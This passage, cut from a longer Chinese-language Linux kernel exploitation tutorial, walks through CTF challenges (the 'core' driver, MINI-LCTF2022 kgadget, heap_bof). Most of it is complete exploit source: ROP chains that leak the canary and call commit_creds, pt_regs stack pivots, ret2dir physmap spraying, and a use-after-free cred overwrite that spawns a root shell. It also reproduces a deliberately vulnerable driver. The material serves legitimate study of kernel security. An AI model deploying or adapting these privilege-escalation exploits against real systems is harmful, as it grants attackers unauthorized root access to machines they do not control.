prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { save_status(); rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." 
); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; size_t *rop = (size_t *) &buf[80 ], it = 0 ; rop[it++] = pop_rdi_ret; rop[it++] = 0x00000000000006f0 ; rop[it++] = mov_cr4_rdi_ret; rop[it++] = (size_t ) get_root; rop[it++] = swapgs_popfq_ret; rop[it++] = 0 ; rop[it++] = iretq; rop[it++] = (size_t ) get_shell; rop[it++] = user_cs; rop[it++] = user_rflags; rop[it++] = user_sp; rop[it++] = user_ss; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
利用 pt_regs 构造 kernel ROP 查看entry_SYSCALL_64 这一用汇编写的函数内部,注意到当程序进入到内核态时,该函数会将所有的寄存器压入内核栈上,形成一个 pt_regs结构体,该结构体实质上位于内核栈底,定义 如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 struct pt_regs { unsigned long r15; unsigned long r14; unsigned long r13; unsigned long r12; unsigned long rbp; unsigned long rbx; unsigned long r11; unsigned long r10; unsigned long r9; unsigned long r8; unsigned long rax; unsigned long rcx; unsigned long rdx; unsigned long rsi; unsigned long rdi; unsigned long orig_rax; unsigned long rip; unsigned long cs; unsigned long eflags; unsigned long rsp; unsigned long ss; };
内核栈只有一个页面的大小,而 pt_regs 结构体则固定位于内核栈栈底,当我们劫持内核结构体中的某个函数指针时(例如 seq_operations->start),在我们通过该函数指针劫持内核执行流时 rsp 与 栈底的相对偏移通常是不变的。
而在系统调用过程当中有很多寄存器其实是不一定能用上的,比如 r8 ~ r15,这些寄存器为我们布置 ROP 链提供了可能。我们不难想到:只需要寻找到一条形如 "add rsp, val ; ret" 的 gadget 便能够完成 ROP。可以在进入内核态前向寄存器写入一些值,看哪些寄存器的值可以被保留,以便后续写入 gadget。
KPTI pass:使用 seq_operations + pt_regs
结构体 seq_operations 的条目如下:
1 2 3 4 5 6 7 struct seq_operations { void * (*start) (struct seq_file *m, loff_t *pos); void (*stop) (struct seq_file *m, void *v); void * (*next) (struct seq_file *m, void *v, loff_t *pos); int (*show) (struct seq_file *m, void *v); };
当我们打开一个 stat 文件时(如 /proc/self/stat)便会在内核空间中分配一个 seq_operations 结构体
当我们 read 一个 stat 文件时,内核会调用其 proc_ops 的 proc_read_iter 指针,然后调用 seq_operations->start 函数指针
利用思路 这次我们限制溢出只能覆盖返回地址,此时需要栈迁移到其他地方构造 rop 。其中一个思路就是在 pt_regs 上构造 rop 。我们在调用 core_copy_func 函数之前先将寄存器设置为几个特殊的值,然后在 core_copy_func 函数的返回处下断点。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 __asm__( "mov r15, 0x1111111111111111;" "mov r14, 0x2222222222222222;" "mov r13, 0x3333333333333333;" "mov r12, 0x4444444444444444;" "mov rbp, 0x5555555555555555;" "mov rbx, 0x6666666666666666;" "mov r11, 0x7777777777777777;" "mov r10, 0x8888888888888888;" "mov r9, 0x9999999999999999;" "mov r8, 0xaaaaaaaaaaaaaaaa;" "mov rcx, 0xbbbbbbbbbbbbbbbb;" "mov rax, 0x10;" "mov rdx, 0xffffffffffff0050;" "mov rsi, 0x6677889A;" "mov rdi, core_fd;" "syscall" );
数字没变的寄存器就是我们能够控制的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 0b:0058│ 0xffffc90000113f58 ◂— 0x1111111111111111 0c:0060│ 0xffffc90000113f60 ◂— 0x2222222222222222 ('""""""""' ) 0d:0068│ 0xffffc90000113f68 ◂— 0x3333333333333333 ('33333333' ) 0e:0070│ 0xffffc90000113f70 ◂— 0x4444444444444444 ('DDDDDDDD' ) 0f:0078│ 0xffffc90000113f78 ◂— 0x5555555555555555 ('UUUUUUUU' ) 10:0080│ 0xffffc90000113f80 ◂— 0x6666666666666666 ('ffffffff' ) 11:0088│ 0xffffc90000113f88 ◂— 0x207 12:0090│ 0xffffc90000113f90 ◂— 0x8888888888888888 13:0098│ 0xffffc90000113f98 ◂— 0x9999999999999999 14:00a0│ 0xffffc90000113fa0 ◂— 0xaaaaaaaaaaaaaaaa 15:00a8│ 0xffffc90000113fa8 ◂— 0xffffffffffffffda 16:00b0│ 0xffffc90000113fb0 —▸ 0x401566 ◂— lea rax, [rip + 0xbb44] 17:00b8│ 0xffffc90000113fb8 ◂— 0xffffffffffff0050 /* 'P' */ 18:00c0│ 0xffffc90000113fc0 ◂— 0x6677889a 19:00c8│ 0xffffc90000113fc8 ◂— 0x614d8e5400000004 1a:00d0│ 0xffffc90000113fd0 ◂— 0x10 1b:00d8│ 0xffffc90000113fd8 —▸ 0x401566 ◂— lea rax, [rip + 0xbb44] 1c:00e0│ 0xffffc90000113fe0 ◂— 0x33 /* '3' */ 1d:00e8│ 0xffffc90000113fe8 ◂— 0x207 1e:00f0│ 0xffffc90000113ff0 —▸ 0x7ffe1d48e620 ◂— 0x0 1f:00f8│ 0xffffc90000113ff8 ◂— 0x2b /* '+' */
新版本内核对抗利用 pt_regs 进行攻击的办法 正所谓魔高一尺道高一丈,内核主线在 这个 commit 中为系统调用栈添加了一个偏移值,这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值:
1 2 3 4 5 6 7 8 9 10 11 12 @@ -38,6 +38,7 @@ #ifdef CONFIG_X86_64 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs) { + add_random_kstack_offset(); nr = syscall_enter_from_user_mode(regs, nr); instrumentation_begin();
当然,若是在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下,仍然可以通过布置一些 slide gadget 来继续完成利用,不过稳定性也大幅下降了。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/ioctl.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t add_rsp_0xe8_ret = 0xffffffff816bb966 ;size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA ;int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; add_rsp_0xe8_ret += offset; swapgs_restore_regs_and_return_to_usermode += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to 
open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; *(size_t *) &buf[80 ] = add_rsp_0xe8_ret; core_write(buf, sizeof (buf)); __asm__( "mov r15, pop_rdi_ret;" "mov r14, init_cred;" "mov r13, commit_creds;" "mov r12, swapgs_restore_regs_and_return_to_usermode+0x8;" "mov rbp, 0x5555555555555555;" "mov rbx, 0x6666666666666666;" "mov r11, 0x7777777777777777;" "mov r10, 0x8888888888888888;" "mov r9, 0x9999999999999999;" "mov r8, 0xaaaaaaaaaaaaaaaa;" "mov rax, 0x10;" "mov rdx, 0xffffffffffff0058;" "mov rsi, 0x6677889A;" "mov rdi, core_fd;" "syscall" ); system("/bin/sh" ); return 0 ; }
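执行 add_rsp_0xe8_ret 这条 gadget 时的栈布局:该 gadget 的实际形式为 add rsp, 0xc8 加 4 次 pop 再 ret(即 add_rsp_0xc8_pop*4_ret),rsp 共抬高 0xc8+0x20=0xe8,之后 ret 会执行到我们通过寄存器布置在 pt_regs 中的 ROP 链。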
ret2dir 如果 pt_regs 所在的内存被修改了,导致最多只能控制 16 字节的内存,我们可以利用 ret2dir 的利用方式将栈迁移至内核的线性映射区。不同版本内核的线性映射区可以从内核源码文档的 mm.txt 查看。
ret2dir 是哥伦比亚大学网络安全实验室在 2014 年提出的一种辅助攻击手法,主要用来绕过 smep、smap、pxn 等用户空间与内核空间隔离的防护手段,原论文 。 Linux 系统中有一部分物理内存会同时被映射到用户空间和内核空间的虚拟地址上。内核空间中的这块区域叫做 direct mapping area,即内核的线性映射区,这个区域映射了所有的物理内存。我们在用户空间中布置的 gadget 可以通过 direct mapping area 上的地址在内核空间中访问到。
但需要注意的是在新版的内核当中 direct mapping area 已经不再具有可执行权限,因此我们很难再在用户空间直接布置 shellcode 进行利用,但我们仍能通过在用户空间布置 ROP 链的方式完成利用。
利用思路 这题主要思路如下:
使用 mmap 喷射大量内存,并在里面写上rop链。
将try_hit的地址传给rbp,再利用leave;ret进行栈迁移。
完成栈迁移,执行提权代码。
返回用户空间时使用 swapgs_restore_regs_and_return_to_usermode 函数需要注意:该函数开头 pop 完寄存器之后,栈上除 iretq 需要的寄存器外还剩 orig_rax 和 rdi。为了缩短 rop 的长度,可以直接 ret 到 swapgs_restore_regs_and_return_to_usermode + 27 处(具体偏移随内核版本而变,下面的 exp 中用的是 + 0x16),不过 rop 链接下来还要有 16 字节的填充,用来占住 orig_rax 和 rdi 的位置。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t add_rsp_0xe8_ret = 0xffffffff816bb966 ;size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA ;size_t retn = 0xFFFFFFFF81003E15 ;size_t pop_rbp_ret = 0xFFFFFFFF812D71EF ;size_t leave_ret = 0xFFFFFFFF81037384 ;const size_t try_hit = 0xffff880000000000 +0x7000000 ;size_t user_cs, user_rflags, user_sp, user_ss;size_t page_size;int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." 
); } void get_shell () { system("/bin/sh" ); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; add_rsp_0xe8_ret += offset; swapgs_restore_regs_and_return_to_usermode += offset; pop_rbp_ret += offset; leave_ret += offset; retn += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } void physmap () { core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Error: open core" ); } page_size = sysconf(_SC_PAGESIZE); printf ("[*] page_size %llx" , &page_size); size_t *rop = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); int idx = 0 ; while (idx < (page_size / 8 - 0x30 )) { rop[idx++] = add_rsp_0xe8_ret; } for (; idx < (page_size / 8 - 0xb ); idx++) { rop[idx] = retn; } rop[idx++] = pop_rdi_ret; rop[idx++] = init_cred; rop[idx++] = commit_creds; rop[idx++] = swapgs_restore_regs_and_return_to_usermode + 0x16 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = (size_t ) get_shell; rop[idx++] = user_cs; rop[idx++] = user_rflags; rop[idx++] = user_sp; rop[idx++] = user_ss; puts ("[*] Spraying physmap..." 
); for (int i = 1 ; i < 15000 ; i++) { size_t *page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); memcpy (page, rop, page_size); } puts ("[*] trigger physmap one_gadget..." ); } int main () { rebase(); save_status(); physmap(); size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[0x40 ] = canary; *(size_t *) &buf[0x50 ] = add_rsp_0xe8_ret; core_write(buf, sizeof (buf)); __asm__( "mov r15, pop_rbp_ret;" "mov r14, try_hit;" "mov r13, leave_ret;" "mov rax, 0x10;" "mov rdx, 0xffffffffffff0058;" "mov rsi, 0x6677889A;" "mov rdi, core_fd;" "syscall" ); return 0 ; }
RetSpill 利用思路 exp MINI-LCTF2022 - kgadget 题目分析 启动脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 #!/bin/sh qemu-system-x86_64 \ -m 256M \ -cpu kvm64,+smep,+smap \ -smp cores=2,threads=2 \ -kernel bzImage \ -initrd ./rootfs.cpio \ -nographic \ -monitor /dev/null \ -snapshot \ -append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \ -no-reboot
没有开kaslr所以有了函数地址。但是开启了smep和smap保护,所以就不能ret2usr了,注意kvm64默认开启kpti保护(当然-append也写了)所以最后返回用户态时要进行页表切换。
题目实现了一个字符设备驱动,其他函数都没什么用,就不放出来了。只有 kgadget_ioctl 这个函数有用:它会把我们传入的参数当作指针解引用,并直接调用取出的地址处的函数。
kgadget_ioctl
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 .text.unlikely:00000000000000F3 ; __int64 __fastcall kgadget_ioctl(file *__file, unsigned int cmd, unsigned __int64 param) .text.unlikely:00000000000000F3 kgadget_ioctl proc near ; DATA XREF: __mcount_loc:0000000000000653↓o .text.unlikely:00000000000000F3 ; .data:kgadget_fo↓o .text.unlikely:00000000000000F3 .text.unlikely:00000000000000F3 regs_addr = qword ptr -20h .text.unlikely:00000000000000F3 .text.unlikely:00000000000000F3 __file = rdi ; file * .text.unlikely:00000000000000F3 cmd = rsi ; unsigned int .text.unlikely:00000000000000F3 param = rdx ; unsigned __int64 .text.unlikely:00000000000000F3 call __fentry__ ; PIC mode .text.unlikely:00000000000000F8 push rbp .text.unlikely:00000000000000F9 mov rbp, rsp .text.unlikely:00000000000000FC push rbx .text.unlikely:00000000000000FD sub rsp, 10h .text.unlikely:0000000000000101 mov rax, gs:28h .text.unlikely:000000000000010A mov [rbp-10h], rax .text.unlikely:000000000000010E xor eax, eax .text.unlikely:0000000000000110 cmp esi, 1BF52h; if esi == 114514 jmp loc_1a3 .text.unlikely:0000000000000116 jnz loc_1A3 .text.unlikely:000000000000011C mov rbx, [param]; arg3 -> rbx .text.unlikely:000000000000011F kgadget_ptr = rbx ; void (*)(void) .text.unlikely:000000000000011F mov __file, offset unk_370 .text.unlikely:0000000000000126 mov cmd, kgadget_ptr .text.unlikely:0000000000000129 call printk ; PIC mode .text.unlikely:000000000000012E mov rdi, offset unk_3A0 .text.unlikely:0000000000000135 call printk ; PIC mode .text.unlikely:000000000000013A mov [rbp-18h], rsp .text.unlikely:000000000000013E mov rax, [rbp-18h] ; rsp -> rax .text.unlikely:0000000000000142 mov rdi, offset unk_3F8 .text.unlikely:0000000000000149 add rax, 1000h .text.unlikely:000000000000014F and rax, 0FFFFFFFFFFFFF000h ; rax -> kstack_end 
.text.unlikely:0000000000000155 lea rdx, [rax-0A8h] .text.unlikely:000000000000015C mov [rbp-18h], rdx .text.unlikely:0000000000000160 regs = rdx ; pt_regs * .text.unlikely:0000000000000160 mov regs, 3361626E74747261h .text.unlikely:000000000000016A mov [rax-0A8h], rdx; 3361626E74747261h -> pt_regs .text.unlikely:0000000000000171 mov [rax-0A0h], rdx .text.unlikely:0000000000000178 mov [rax-98h], rdx .text.unlikely:000000000000017F mov [rax-90h], rdx .text.unlikely:0000000000000186 mov [rax-88h], rdx .text.unlikely:000000000000018D mov [rax-80h], rdx .text.unlikely:0000000000000191 mov [rax-70h], rdx .text.unlikely:0000000000000195 call printk ; PIC mode .text.unlikely:000000000000019A call __x86_indirect_thunk_rbx ;PIC mode ;call rbx .text.unlikely:000000000000019F xor eax, eax .text.unlikely:00000000000001A1 jmp short loc_1B3 .text.unlikely:00000000000001A3 ; --------------------------------------------------------------------------- .text.unlikely:00000000000001A3 .text.unlikely:00000000000001A3 loc_1A3: ; CODE XREF: kgadget_ioctl+23↑j .text.unlikely:00000000000001A3 __file = rdi ; file * .text.unlikely:00000000000001A3 cmd = rsi ; unsigned int .text.unlikely:00000000000001A3 param = rdx ; unsigned __int64 .text.unlikely:00000000000001A3 mov __file, offset unk_420 .text.unlikely:00000000000001AA call printk ; PIC mode .text.unlikely:00000000000001AF or rax, 0FFFFFFFFFFFFFFFFh .text.unlikely:00000000000001B3 .text.unlikely:00000000000001B3 loc_1B3: ; CODE XREF: kgadget_ioctl+AE↑j .text.unlikely:00000000000001B3 mov rcx, [rbp-10h] .text.unlikely:00000000000001B7 xor rcx, gs:28h .text.unlikely:00000000000001C0 jz short loc_1C7 .text.unlikely:00000000000001C2 call __stack_chk_fail ; PIC mode .text.unlikely:00000000000001C7 ; --------------------------------------------------------------------------- .text.unlikely:00000000000001C7 .text.unlikely:00000000000001C7 loc_1C7: ; CODE XREF: kgadget_ioctl+CD↑j .text.unlikely:00000000000001C7 pop rdx 
.text.unlikely:00000000000001C8 pop rcx .text.unlikely:00000000000001C9 pop rbx .text.unlikely:00000000000001CA pop rbp .text.unlikely:00000000000001CB retn .text.unlikely:00000000000001CB kgadget_ioctl endp
不过根据它输出的提示信息,pt_regs 中只有 r8 和 r9 寄存器可以使用。此外 r11 和 rcx 的值在上面的代码中也没有被覆盖,但调试时发现它们同样会被改写。
利用思路 这题主要思路如下:
使用 mmap 喷射大量内存,并在里面写上rop链。
将try_hit的地址传给rdx寄存器,利用kgadget_ioctl去call rbx。
完成栈迁移,执行提权代码。
返回用户空间时使用 swapgs_restore_regs_and_return_to_usermode 函数需要注意:该函数开头 pop 完寄存器之后,栈上除 iretq 需要的寄存器外还剩 orig_rax 和 rdi。为了缩短 rop 的长度,可以直接 ret 到 swapgs_restore_regs_and_return_to_usermode + 27 处,不过 rop 链接下来还要有 16 字节的填充,用来占住 orig_rax 和 rdi 的位置。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> const size_t try_hit = 0xffff888000000000 + 0x7000000 ;size_t user_cs, user_rflags, user_sp, user_ss;size_t page_size;int dev_fd;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." ); } void get_shell () { system("/bin/sh" ); } int main () { save_status(); dev_fd = open("/dev/kgadget" , O_RDWR); if (dev_fd < 0 ) { puts ("[-] Error: open kgadget" ); } page_size = sysconf(_SC_PAGESIZE); size_t *rop = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); int idx = 0 ; while (idx < (page_size / 8 - 0x30 )) { rop[idx++] = 0xffffffff810737fe ; } for (; idx < (page_size / 8 - 11 ); idx++) { rop[idx] = 0xffffffff8108c6f1 ; } rop[idx++] = 0xffffffff8108c6f0 ; rop[idx++] = 0xffffffff82a6b700 ; rop[idx++] = 0xffffffff810c92e0 ; rop[idx++] = 0xffffffff81c00fb0 + 27 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = 0x0000000000000000 ; rop[idx++] = (size_t ) get_shell; rop[idx++] = user_cs; rop[idx++] = user_rflags; rop[idx++] = user_sp; rop[idx++] = user_ss; puts ("[*] Spraying physmap..." ); for (int i = 1 ; i < 15000 ; i++) { sigset_t *page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); memcpy (page, rop, page_size); } puts ("[*] trigger physmap one_gadget..." 
); __asm__( "mov r15, 0xbeefdead;" "mov r14, 0x11111111;" "mov r13, 0x22222222;" "mov r12, 0x33333333;" "mov rbp, 0x44444444;" "mov rbx, 0x55555555;" "mov r11, 0x66666666;" "mov r10, 0x77777777;" "mov r9, 0xffffffff811483d0;" "mov r8, try_hit;" "mov rax, 0x10;" "mov rcx, 0xaaaaaaaa;" "mov rdx, try_hit;" "mov rsi, 0x1bf52;" "mov rdi, dev_fd;" "syscall" ); return 0 ; }
流程:
在我们rop处下断点,发现执行到我们喷射的gadget处时,r8(pop rsp)距离rsp有0xa0大小,找到add rsp,0xa0;;;;ret样式的 gadget即可将栈迁移到我们用于提权的 gadget 处。
(1)利用kgadget_ioctl和pt_regs保留的r8-r9完成栈迁移。
(2)栈不断抬高,执行get_root。
内核堆利用 heap_bof 题目分析 题目给了源码,存在UAF和heap overflow两种漏洞。内核版本为4.4.27
/*
 * heap_bof challenge driver: a character device /dev/bof whose ioctl handler
 * lets user space allocate, free, read and write kernel heap objects held in
 * a global table. This is the challenge source and is reproduced unchanged.
 */
#include <asm/uaccess.h>
#include <linux/cdev.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/types.h>

struct class *bof_class;
struct cdev cdev;
int bof_major = 256;

/* Table of kmalloc'ed objects, indexed by param.idx. */
char *ptr[40];

/* Argument block copied in from user space on every ioctl. */
struct param {
    size_t len;         /* allocation size or number of bytes to copy */
    char *buf;          /* user-space buffer */
    unsigned long idx;  /* slot in ptr[] */
};

/*
 * ioctl dispatcher. Commands:
 *   5 - ptr[idx] = kmalloc(len)
 *   7 - kfree(ptr[idx]); the slot keeps the stale pointer
 *   8 - copy len bytes from the user buffer into ptr[idx]
 *   9 - copy len bytes from ptr[idx] to the user buffer
 * Neither idx nor len is validated against the table size or the size of
 * the allocated object, and no copy result is checked.
 * Returns 0 for a known command and -1 otherwise.
 */
long bof_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    struct param p_arg;
    copy_from_user(&p_arg, (void *) arg, sizeof(struct param));
    long retval = 0;
    switch (cmd) {
        case 9:
            copy_to_user(p_arg.buf, ptr[p_arg.idx], p_arg.len);
            printk("copy_to_user: 0x%lx\n", *(long *) ptr[p_arg.idx]);
            break;
        case 8:
            copy_from_user(ptr[p_arg.idx], p_arg.buf, p_arg.len);
            break;
        case 7:
            kfree(ptr[p_arg.idx]);
            /* The freed pointer is only logged, never cleared. */
            printk("free: 0x%p\n", ptr[p_arg.idx]);
            break;
        case 5:
            ptr[p_arg.idx] = kmalloc(p_arg.len, GFP_KERNEL);
            printk("alloc: 0x%p, size: %2lx\n", ptr[p_arg.idx], p_arg.len);
            break;
        default:
            retval = -1;
            break;
    }
    return retval;
}

static const struct file_operations bof_fops = {
    .owner = THIS_MODULE,
    .unlocked_ioctl = bof_ioctl,
};

/*
 * Module init: reserve the device number (fixed major if bof_major is
 * non-zero, otherwise a dynamically allocated one), create the class and
 * device node, and register the cdev.
 */
static int bof_init(void) {
    dev_t devno = MKDEV(bof_major, 0);
    int result;
    if (bof_major)
        result = register_chrdev_region(devno, 1, "bof");
    else {
        result = alloc_chrdev_region(&devno, 0, 1, "bof");
        bof_major = MAJOR(devno);
    }
    printk("bof_major /dev/bof: %d\n", bof_major);
    if (result < 0)
        return result;
    bof_class = class_create(THIS_MODULE, "bof");
    device_create(bof_class, NULL, devno, NULL, "bof");
    cdev_init(&cdev, &bof_fops);
    cdev.owner = THIS_MODULE;
    cdev_add(&cdev, devno, 1);
    return 0;
}

/* Module exit: undo bof_init() in reverse order. */
static void bof_exit(void) {
    cdev_del(&cdev);
    device_destroy(bof_class, MKDEV(bof_major, 0));
    class_destroy(bof_class);
    unregister_chrdev_region(MKDEV(bof_major, 0), 1);
    printk("bof exit success\n");
}

MODULE_AUTHOR("exp_ttt");
MODULE_LICENSE("GPL");
module_init(bof_init);
module_exit(bof_exit);
boot.sh
这道题是多核多线程。并且开启了smep和smap。
1 2 3 4 5 6 7 8 9 10 11 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.cpio \ -kernel bzImage \ -m 512M \ -nographic \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet kaslr' \ -monitor /dev/null \ -smp cores=2,threads=2 \ -cpu kvm64,+smep,+smap \
Use After Free 利用思路 cred 结构体大小为 0xa8 ,根据 slub 分配机制,如果先申请再释放一个大小为 0xa8(实际占用 0xc0 )的内存块,此时再 fork 出一个新进程,则新进程的 cred 结构体正是刚才释放掉的内存块。利用 UAF 漏洞修改 cred 就可以实现提权。
/*
 * exp -- heap_bof, use-after-free on a cred-sized object: allocate and free
 * a 0xa8-byte object, fork so that the child's cred is expected to reuse the
 * freed slot, then zero its first bytes through the dangling pointer.
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/wait.h>

#define BOF_MALLOC 5
#define BOF_FREE 7
#define BOF_EDIT 8
#define BOF_READ 9

/* Mirrors the driver's argument block. */
struct param {
    size_t len;
    char *buf;
    unsigned long idx;
};

int main(void)
{
    /* Absolute path, so the exploit works from any working directory. */
    int fd = open("/dev/bof", O_RDWR);
    if (fd < 0) {
        puts("[-] Failed to open bof device.");
        return -1;
    }

    struct param p = {0xa8, malloc(0xa8), 1};
    if (p.buf == NULL) {
        puts("[-] malloc error");
        close(fd);
        return -1;
    }

    /* Leave a dangling pointer to a freed 0xa8-byte object in slot 1. */
    ioctl(fd, BOF_MALLOC, &p);
    ioctl(fd, BOF_FREE, &p);

    int pid = fork();
    if (pid < 0) {
        puts("[-]fork error");
        return -1;
    }

    if (pid == 0) {
        /*
         * Write 0x30 zero bytes through the dangling pointer. The existing
         * 0xa8-byte buffer is large enough, so no second allocation is made.
         * NOTE(review): 0x30 presumably covers the id fields at the start of
         * struct cred -- confirm against the target kernel.
         */
        p.len = 0x30;
        memset(p.buf, 0, p.len);
        ioctl(fd, BOF_EDIT, &p);

        if (getuid() == 0) {
            puts("[+]root success");
            system("/bin/sh");
        } else {
            puts("[-]root failed");
        }
    } else {
        wait(NULL);
    }

    close(fd);
    return 0;
}
但是此种方法在较新版本 kernel 中已不可行,我们已无法直接分配到 cred_jar 中的 object,这是因为 cred_jar 在创建时设置了 SLAB_ACCOUNT 标记,在 CONFIG_MEMCG_KMEM=y 时(默认开启)cred_jar 不会再与相同大小的 kmalloc-192 进行合并。
